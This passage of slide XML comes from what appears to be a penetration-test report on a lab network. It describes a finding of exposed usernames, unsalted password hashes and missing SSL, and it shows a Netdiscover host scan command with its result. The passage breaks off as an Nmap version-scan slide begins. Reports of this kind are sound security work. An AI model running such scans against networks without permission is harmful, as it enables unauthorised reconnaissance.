                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>User account names, unsalted password hashes, and SSL was not used for all authenticated pages on the server.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="dbd9e8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr lIns="182520" rIns="182520" tIns="91080" bIns="91080" anchor="t">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en" sz="750" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Usernames are half of the credentials already available for password cracking or brute force attack attempts. Exposed password hash(es) allow for easy decryption of password(s). Not using SSL to encrypt data connections also allow browser session cookies to be hijacked to access the data.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="750" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="t" marL="182520" marR="182520">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a9b7c0"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:no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12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Exploitation: Netdiscover Scan</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;1091;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="723600" y="1480680"/>
            <a:ext cx="2428200" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="298" name="Google Shape;1092;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="887760"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="457200" y="887760"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="299" name="Google Shape;1093;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="887760"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="Google Shape;1094;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="593640" y="1276920"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;1095;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724320" y="1480680"/>
            <a:ext cx="2371320" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Netdiscover was first used to determine available connected online hosts in the network. The “-r” option is used for IP range.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>netdiscover -r 192.168.1.0/16</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>*Passive “-p” option was not able to be used as there was not enough ”regular” traffic on the network with generating it first. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="302" name="Google Shape;1096;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228840" y="887760"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="3228840" y="887760"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="303" name="Google Shape;1097;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3228840" y="887760"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="304" name="Google Shape;1098;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3365640" y="1276920"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;1099;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3495240" y="1480680"/>
            <a:ext cx="2428200" cy="1187280"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;1100;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495960" y="1480680"/>
            <a:ext cx="2428200" cy="1187280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>This scan revealed that there were 3 hosts on the network IP range that were connected. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="307" name="Google Shape;1101;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134040" y="888480"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="6134040" y="888480"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="308" name="Google Shape;1102;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6134040" y="888480"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="Google Shape;1103;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6270480" y="1277640"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;1104;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6400440" y="1481400"/>
            <a:ext cx="2428200" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;1105;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401160" y="1481400"/>
            <a:ext cx="2371320" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>See below screenshot for results:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="312" name="Google Shape;1106;p61" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495960" y="2746080"/>
            <a:ext cx="5333400" cy="18882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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Exploitation: NMap Version Scan For Open Ports</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;1113;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="723600" y="1480680"/>
            <a:ext cx="2428200" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;1114;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724320" y="1480680"/>
            <a:ext cx="2371320" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
